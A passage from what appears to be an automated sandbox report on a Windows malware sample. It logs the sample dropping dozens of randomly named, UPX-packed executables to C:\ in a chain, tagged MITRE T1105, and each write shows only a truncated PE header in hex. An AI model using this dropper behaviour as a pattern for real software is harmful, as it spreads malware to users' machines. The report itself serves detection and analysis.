4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdvxbf.exe\" wrote 14544 bytes starting with PE header signature to file \"C:\\txbxjp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"txbxjp.exe\" wrote 14556 bytes starting with PE header signature to file \"C:\\frdfrrr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"frdfrrr.exe\" wrote 14567 bytes starting with PE header signature to file \"C:\\464448.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"464448.exe\" wrote 14583 bytes starting with PE header signature to file \"C:\\jlrnp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jlrnp.exe\" wrote 14597 bytes starting with PE header signature to file \"C:\\tbxfnh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tbxfnh.exe\" wrote 14610 bytes starting with PE header signature to file \"C:\\fptjxhr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fptjxhr.exe\" wrote 14628 bytes starting with PE header signature to file \"C:\\ffjhjxx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ffjhjxx.exe\" wrote 14644 bytes starting with PE header signature to file \"C:\\84624.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"84624.exe\" wrote 14658 bytes starting with PE header signature to file \"C:\\4682600.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4682600.exe\" wrote 14675 bytes starting with PE header signature to file \"C:\\2040668.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2040668.exe\" wrote 14685 bytes starting with PE header signature to file \"C:\\686200.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"686200.exe\" wrote 14698 bytes starting with PE header signature to file \"C:\\026288.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"026288.exe\" wrote 14712 bytes starting with PE header signature to file \"C:\\2420222.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2420222.exe\" wrote 14723 bytes starting with PE header signature to file \"C:\\6088244.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6088244.exe\" wrote 14742 bytes starting with PE header signature to file \"C:\\826268.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"826268.exe\" wrote 14754 bytes starting with PE header signature to file \"C:\\phdjp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"phdjp.exe\" wrote 14768 bytes starting with PE header signature to file \"C:\\ldpfr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ldpfr.exe\" wrote 14778 bytes starting with PE header signature to file \"C:\\dtlrb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dtlrb.exe\" wrote 14796 bytes starting with PE header signature to file \"C:\\jrfndd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jrfndd.exe\" wrote 14810 bytes starting with PE header signature to file \"C:\\nvphdb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nvphdb.exe\" wrote 14824 bytes starting with PE header signature to file \"C:\\djlfb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"djlfb.exe\" wrote 14835 bytes starting with PE header signature to file \"C:\\4804042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4804042.exe\" wrote 14848 bytes starting with PE header signature to file \"C:\\46420.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"46420.exe\" wrote 14867 bytes starting with PE header signature to file \"C:\\208666.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"208666.exe\" wrote 14886 bytes starting with PE header signature to file \"C:\\2084042.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2084042.exe\" wrote 14906 bytes starting with PE header signature to file \"C:\\08684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"08684.exe\" wrote 14920 bytes starting with PE header signature to file \"C:\\flrpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"flrpd.exe\" wrote 14937 bytes starting with PE header signature to file \"C:\\pjjvtd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pjjvtd.exe\" wrote 14955 bytes starting with PE header signature to file \"C:\\pdhfl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pdhfl.exe\" wrote 14972 bytes starting with PE header signature to file \"C:\\tlxll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tlxll.exe\" wrote 14988 bytes starting with PE header signature to file \"C:\\bnrhnlj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bnrhnlj.exe\" wrote 15002 bytes starting with PE header signature to file \"C:\\rflrbrt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rflrbrt.exe\" wrote 15021 bytes starting with PE header signature to file \"C:\\fxrlrh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fxrlrh.exe\" wrote 15034 bytes starting with PE header signature to file \"C:\\nrjljrp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nrjljrp.exe\" wrote 15052 bytes starting with PE header signature to file \"C:\\pjjdj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pjjdj.exe\" wrote 15065 bytes starting with PE header signature to file \"C:\\44266.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"44266.exe\" wrote 15082 bytes starting with PE header signature to file \"C:\\6046286.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"6046286.exe\" wrote 15094 bytes starting with PE header signature to file \"C:\\8682642.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8682642.exe\" wrote 15104 bytes starting with PE header signature to file \"C:\\2246640.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2246640.exe\" wrote 15118 bytes starting with PE header signature to file \"C:\\064826.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"064826.exe\" wrote 15130 bytes starting with PE header signature to file \"C:\\nffhjx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nffhjx.exe\" wrote 15145 bytes starting with PE header signature to file \"C:\\fnjvr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fnjvr.exe\" wrote 15163 bytes starting with PE header signature to file \"C:\\bjdjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bjdjr.exe\" wrote 15181 bytes starting with PE header signature to file \"C:\\626200.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"626200.exe\" wrote 15192 bytes starting with PE header signature to file \"C:\\02242.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"02242.exe\" wrote 15212 bytes starting with PE header signature to file \"C:\\jpflb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jpflb.exe\" wrote 15223 bytes starting with PE header signature to file \"C:\\xdhlrl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xdhlrl.exe\" wrote 15243 bytes starting with PE header signature to file \"C:\\xbnxx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbnxx.exe\" wrote 15254 bytes starting with PE header signature to file \"C:\\tbnhh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tbnhh.exe\" wrote 15270 bytes starting with PE header signature to file \"C:\\240802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"240802.exe\" wrote 15282 bytes starting with PE header signature to file \"C:\\24642.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"24642.exe\" wrote 15300 bytes starting with PE header signature to file \"C:\\22840.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22840.exe\" wrote 15319 bytes starting with PE header signature to file \"C:\\866846.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"866846.exe\" wrote 15337 bytes starting with PE header signature to file \"C:\\4640804.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4640804.exe\" wrote 15349 bytes starting with PE header signature to file \"C:\\068420.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"068420.exe\" wrote 15369 bytes starting with PE header signature to file \"C:\\42828.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42828.exe\" wrote 15384 bytes starting with PE header signature to file \"C:\\6804604.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"jvhfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"042468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2626426.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8428466.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"npxxxd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pffjpht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjxrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"trnnjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ttfvnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"240606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6402288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bttfvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hnjnfnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rjfjrfn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jfhhd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6804604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6804604.exe]- [targetUID: 00000000-00004324]\n \"42828.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42828.exe]- [targetUID: 00000000-00003296]\n \"068420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\068420.exe]- [targetUID: 00000000-00002524]\n \"4640804.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4640804.exe]- [targetUID: 00000000-00002524]\n \"866846.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\866846.exe]- [targetUID: 00000000-00003528]\n \"22840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22840.exe]- [targetUID: 00000000-00004588]\n \"24642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24642.exe]- [targetUID: 00000000-00001768]\n \"240802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\240802.exe]- [targetUID: 00000000-00001768]\n \"tbnhh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbnhh.exe]- [targetUID: 00000000-00001448]\n \"xbnxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbnxx.exe]- [targetUID: 00000000-00003864]\n \"xdhlrl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xdhlrl.exe]- [targetUID: 00000000-00003864]\n \"jpflb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jpflb.exe]- [targetUID: 00000000-00003976]\n \"02242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\02242.exe]- [targetUID: 00000000-00000568]\n \"626200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626200.exe]- [targetUID: 00000000-00000568]\n \"bjdjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjdjr.exe]- [targetUID: 00000000-00003944]\n \"fnjvr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnjvr.exe]- [targetUID: 00000000-00003944]\n \"nffhjx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nffhjx.exe]- [targetUID: 00000000-00000596]\n \"064826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\064826.exe]- [targetUID: 00000000-00001076]\n \"2246640.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2246640.exe]- [targetUID: 00000000-00001076]\n \"8682642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8682642.exe]- [targetUID: 00000000-00004520]\n \"6046286.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6046286.exe]- [targetUID: 00000000-00004520]\n \"44266.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44266.exe]- [targetUID: 00000000-00003580]\n \"pjjdj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pjjdj.exe]- [targetUID: 00000000-00003580]\n \"nrjljrp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrjljrp.exe]- [targetUID: 00000000-00003180]\n \"fxrlrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxrlrh.exe]- [targetUID: 00000000-00003180]\n \"rflrbrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rflrbrt.exe]- [targetUID: 00000000-00003188]\n \"bnrhnlj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnrhnlj.exe]- [targetUID: 00000000-00003452]\n \"tlxll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlxll.exe]- [targetUID: 00000000-00004172]\n \"pdhfl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdhfl.exe]- [targetUID: 00000000-00004172]\n \"pjjvtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pjjvtd.exe]- [targetUID: 00000000-00004292]\n \"flrpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flrpd.exe]- [targetUID: 00000000-00004292]\n \"08684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08684.exe]- [targetUID: 00000000-00002516]\n \"2084042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2084042.exe]- [targetUID: 00000000-00003768]\n \"208666.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\208666.exe]- [targetUID: 00000000-00003768]\n \"46420.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46420.exe]- [targetUID: 00000000-00001460]\n \"4804042.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4804042.exe]- [targetUID: 00000000-00001460]\n \"djlfb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\djlfb.exe]- [targetUID: 00000000-00003900]\n \"nvphdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvphdb.exe]- [targetUID: 00000000-00003900]\n \"jrfndd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrfndd.exe]- [targetUID: 00000000-00002136]\n \"dtlrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtlrb.exe]- [targetUID: 00000000-00002564]\n \"ldpfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpfr.exe]- [targetUID: 00000000-00004040]\n \"phdjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\phdjp.exe]- [targetUID: 00000000-00004040]\n \"826268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\826268.exe]- [targetUID: 00000000-00002648]\n \"6088244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6088244.exe]- [targetUID: 00000000-00001696]\n \"2420222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2420222.exe]- [targetUID: 00000000-00001416]\n \"026288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026288.exe]- [targetUID: 00000000-00002528]\n \"686200.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\686200.exe]- [targetUID: 00000000-00002528]\n \"2040668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2040668.exe]- [targetUID: 00000000-00004448]\n \"4682600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4682600.exe]- [targetUID: 00000000-00003724]\n \"84624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84624.exe]- [targetUID: 00000000-00003724]\n \"ffjhjxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffjhjxx.exe]- [targetUID: 00000000-00006016]\n \"fptjxhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fptjxhr.exe]- [targetUID: 00000000-00004124]\n \"tbxfnh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tbxfnh.exe]- [targetUID: 00000000-00004124]\n \"jlrnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jlrnp.exe]- [targetUID: 00000000-00003568]\n \"464448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: 